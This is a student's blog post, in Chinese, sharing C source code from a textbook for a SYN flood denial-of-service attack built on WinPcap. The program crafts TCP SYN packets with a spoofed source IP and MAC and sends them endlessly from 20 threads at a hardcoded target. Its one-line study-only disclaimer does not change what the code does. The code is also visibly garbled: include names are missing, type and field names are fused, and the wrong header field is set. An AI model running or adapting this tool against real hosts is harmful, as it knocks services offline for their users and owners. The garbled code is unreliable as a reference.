SYN洪泛攻击(网络攻防原理与技术)
第一次写博客,因为在调试那本书的代码的时候碰到很多问题,感谢CSDN的帮助,现在准备把调试好了的源码发出来给学弟学妹们分享,也供大家交流学习,本人很菜,如有问题,请多指正。
本段代码仅限于研究学习,禁止用于破坏活动,对于出现安全问题,本人概不负责!
运行环境:VS2013、WinPcap
#define WIN32_LEAN_AND_AND_MEAN
#define _WSPIAPI_COUNTOF
#include
#include
#include
#include
#include
#include
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib, "wpcap.lib")
#pragma comment(lib, "packet.lib")
#define MAXTHREAD 20
#define OID_802_3_CURRENT_ADDRESS 0x01010102
#define OPTION_LENTH 6
#define SYN_DEST_IP "192.168.0.22"//被攻击IP
#define SYN_DEST_PORT 80//被攻击端口
#define FAKE_IP "192.168.0.11"//伪装IP
#define FAKE_MAC "\xB8\xAC\x6F\x1F\x26\xF6"//伪装MAC
//内存对齐必须是1
#pragma pack(1)
typedef struct et_header//以太网首部
{
unsigned chareh_dst[6];//目的MAC
unsigned chareh_src[6];//源MAC
unsigned shorteh_type;//上层协议类型
}ET_HEADER;
typedef struct ip_hdr//IP首部
{
unsigned charh_verlen;//版本与首部长度
unsigned chartos;//区分服务
unsigned shorttotal_len;//总长度
unsigned shortident;//标识
unsigned shortfrag_and_flags;//3位标志与13位的片偏移
unsigned charttl;//生存时间
unsigned charproto;//协议
unsigned shortchecksum;//首部校验和
unsigned intsourceIP;//源IP
unsigned intdestIP;//目的IP
}IP_HEADER;
typedef struct tcp_hdr//TCP首部
{
unsigned shortth_sport;//16位源端口
unsigned shortth_dport;//16位目的端口
unsigned intth_seq;//32位序列号
unsigned intth_ack;//32位确认号
unsigned shortth_data_flag;//16位标志位
unsigned short_win;//16位窗口大小
unsigned short_sum;//16位校验和
unsigned short_urp;//16位紧急数据偏移量
unsigned intoption[OPTION_LENTH];
}TCP_HEADER;
typedef struct psd_hdr//TCP伪首部
{
unsigned long saddr;//源地址
unsigned long daddr;//目的地址
char mbz;
char ptcl;//协议类型
unsigned shorttcpl;//TCP长度
}PSD_HEADER;
typedef struct _SYN_PACKET//最终SYN包结构
{
ET_HEADER eth;//以太网头部
IP_HEADER ph;//arp数据包头部
TCP_HEADER tcph;//TCP数据包头部
}SYN_PACKET;
#pragma pack()
typedef struct _PARAMETERS
{
unsigned int srcIP;
unsigned int dstIP;
unsigned short dstPort;
unsigned char* srcmac;
unsigned char dstmac[6];
pcap_t* adhandle;
}PARAMETERS, *LPPARAMETERS;
//********************获得网卡的Mac地址**************************************************************//
unsigned char* GetSelfMac(char* pDevName)
{
static u_char mac[6];
memset(mac, 0, sizeof(mac));
LPADAPTER lpAdapter = PacketOpenAdapter(pDevName);
if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
{
return NULL;
}
PPACKET_OID_DATA OidData =
(PPACKET_OID_DATA)malloc(6 + sizeof(PPACKET_OID_DATA));
if (OidData == NULL)
{
PacketCloseAdapter(lpAdapter);
return NULL;
}
OidData->Oid = OID_802_3_CURRENT_ADDRESS;//不确定*********************
OidData->Length = 6;
memset(OidData->Data, 0, 6);
BOOLEAN Status = PacketRequest(lpAdapter, FALSE, OidData);
if (Status)
{
memcpy(mac, (u_char*)(OidData->Data), 6);
}
free(OidData);
PacketCloseAdapter(lpAdapter);
return mac;
}
//计算校验和
unsigned short CheckSum(unsigned short * buffer, int size)
{
unsigned long cksum = 0;
while (size>1)
{
cksum += *buffer++;
size -= sizeof(unsigned short);
}
if (size)
{
cksum += *(unsigned char *)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum>>16);
return (unsigned short)(~cksum);
}
//封装ARP请求包
void BuildSYNPacket(SYN_PACKET &packet,
unsigned char * source_mac,
unsigned char * dest_mac,
unsigned long srcIp,
unsigned long destIp,
unsigned short dstPort)
{
PSD_HEADER PsdHeader;
//定义以太网首部
memcpy(packet.eth.chareh_dst,dest_mac,6);
memcpy(packet.eth.chareh_src,source_mac, 6);
packet.eth.shorteh_type = htons(0x0800);//ARP协议值类型为0X0800
//定义IP头
packet.ph.charh_verlen = 0;
packet.ph.charh_verlen = ((4 << 4) | sizeof(IP_HEADER) / sizeof(unsigned int));
packet.ph.chartos = 0;
packet.ph.shorttotal_len = htons(sizeof(IP_HEADER) + sizeof(TCP_HEADER));
packet.ph.shortident = 1;
packet.ph.shortfrag_and_flags = htons(1 << 14);
packet.ph.charttl = 128;
packet.ph.charh_verlen = IPPROTO_TCP;
packet.ph.shortchecksum = 0;
packet.ph.intsourceIP = srcIp;
packet.ph.intdestIP = destIp;
//定义TCP头
packet.tcph.shortth_sport = htons(rand() % 60000 + 1024);
packet.tcph.shortth_dport = htons(dstPort);
packet.tcph.intth_seq = htonl(rand() % 90000000 + 100000);
packet.tcph.intth_ack = 0;
packet.tcph.shortth_data_flag = 0;
packet.tcph.shortth_data_flag = (11 << 4 | 2 << 8);
packet.tcph.short_win = htons(512);
packet.tcph.short_sum = 0;
packet.tcph.short_urp = 0;
packet.tcph.intoption [0] = htonl(0X020405B4);
packet.tcph.intoption[1] = htonl(0x01030303);
packet.tcph.intoption[2] = htonl(0x0101080A);
packet.tcph.intoption[3] = htonl(0x00000000);
packet.tcph.intoption[4] = htonl(0X00000000);
packet.tcph.intoption[5] = htonl(0X01010402);
//构造伪头部
PsdHeader.saddr = srcIp;
PsdHeader.daddr = packet.ph.intdestIP;
PsdHeader.mbz = 0;
PsdHeader.ptcl= IPPROTO_TCP;
PsdHeader.shorttcpl = htons(sizeof(TCP_HEADER));
BYTE Buffer[sizeof(PsdHeader) + sizeof(TCP_HEADER)] = { 0 };
memcpy(Buffer, &PsdHeader, sizeof(PsdHeader));
memcpy(Buffer + sizeof(PsdHeader), &packet.tcph, sizeof(TCP_HEADER));
packet.tcph.short_sum = CheckSum((unsigned short *)Buffer,
sizeof(PsdHeader) + sizeof(TCP_HEADER));
memset(Buffer, 0, sizeof(Buffer));
memcpy(Buffer, &packet.ph, sizeof(IP_HEADER));
packet.ph.shortchecksum = CheckSum((unsigned short *)Buffer, sizeof(IP_HEADER));
return;
}
//发包线程函数
DWORD WINAPI SYNFloodThread(LPVOID Ip)
{
PARAMETERS param;
param = *((LPPARAMETERS)Ip);
Sleep(10);
while (true)
{
SYN_PACKET packet;
BuildSYNPacket(packet,param.srcmac, param.dstmac,
param.srcIP, param.dstIP, param.dstPort/*shortstPort*/);
if (pcap_sendpacket(param.adhandle,
(const unsigned char*)&packet,
sizeof(packet)) == -1)
{
fprintf(stderr, "pacp_sendpacket error.\n");
}
}
return 1;
}
//***************************主函数*****************************//
int main(const int argc,const char* argv[])
{
unsigned long fakeIp = inet_addr(FAKE_IP);//要伪装成的IP地址
if (fakeIp == INADDR_NONE)
{
fprintf(stderr, " Invalid IP;%s\n", FAKE_IP);
return -1;
}
unsigned long destIp = inet_addr(SYN_DEST_IP);//目的IP
if (destIp == INADDR_NONE)
{
fprintf(stderr, " Invalid IP:%s\n", SYN_DEST_IP);
return -1;
}
unsigned short dstPort = SYN_DEST_PORT;//目的端口
if (dstPort <0 || dstPort > 65535)
{
fprintf(stderr, " Invalid Port:% d\n", SYN_DEST_PORT);
return -1;
}
pcap_if_t * alldevs;//全部网卡列表
pcap_if_t*d; //一个网卡
pcap_addr_t * pAddr;//网卡地址
char errbuf[PCAP_ERRBUF_SIZE];//错误缓冲区
if (pcap_findalldevs(&alldevs, errbuf) == -1)//获取本机网卡列表
{
fprintf(stderr, " Error in pcap_findalldevs:% s\n", errbuf);
exit(1);
}
int i = 0;
for (d = alldevs; d; d = d->next)
{
printf("%d",++i);
if (d->description)
printf(". %s、n" ,d->description);
else
printf(". No desription avilable");
}
if (i == 0)
{
fprintf(stderr,"\nNo interfaces found! \n");
return -1;
}
printf(" Enter the interface number (1 -%d):", i);
int inum;//用户选择的网卡序号
scanf_s(" % d", &inum);
if (inum<1 || inum >i)
{
printf(" InInterface number out of range. \n");
pcap_freealldevs (alldevs);
return -1;
}
HANDLE threadhandle[MAXTHREAD];
PARAMETERS param;//设置 MAC 地址
memcpy(param.dstmac, FAKE_MAC, 6);//填充线程的参数体
param.dstIP = destIp;
param.srcIP = fakeIp;
param.dstPort = dstPort;
//移动指针到用户选择的网卡
for (d = alldevs, i = 0; i< inum - 1; d = d->next, i++);
param.srcmac = GetSelfMac(d->name);
printf(" 发送SYN包,本机(%.2X-%.2X- %.2X-%.2X-%.2X- %.2X)试图伪装成%s/n",
param.srcmac[0],
param.srcmac[1],
param.srcmac[2],
param.srcmac[3],
param.srcmac[4],
param.srcmac[5], FAKE_IP);
if ((param.adhandle = pcap_open_live(d->name, 65536, 0, 1000, errbuf)) == NULL)
{
fprintf(stderr, " \nUnable to open adapter.\n");
pcap_freealldevs(alldevs);
return -1;
}
pAddr = d->addresses;
while (pAddr)
{
//创造多线程
for (int i = 0; i < MAXTHREAD; i++)
{
threadhandle[i] =
CreateThread(NULL, 0, SYNFloodThread ,(void *)¶m, 0, NULL);
if (!threadhandle)
{
printf("CreateThread eror:% d\n", GetLastError());
}
Sleep(100);
}
pAddr = pAddr->next;
}
printf("退出请输入q或者Q! \n");
char cQuit;
do {
cQuit = getchar();
} while (cQuit != 'q'&& cQuit != 'Q');
return 0;
}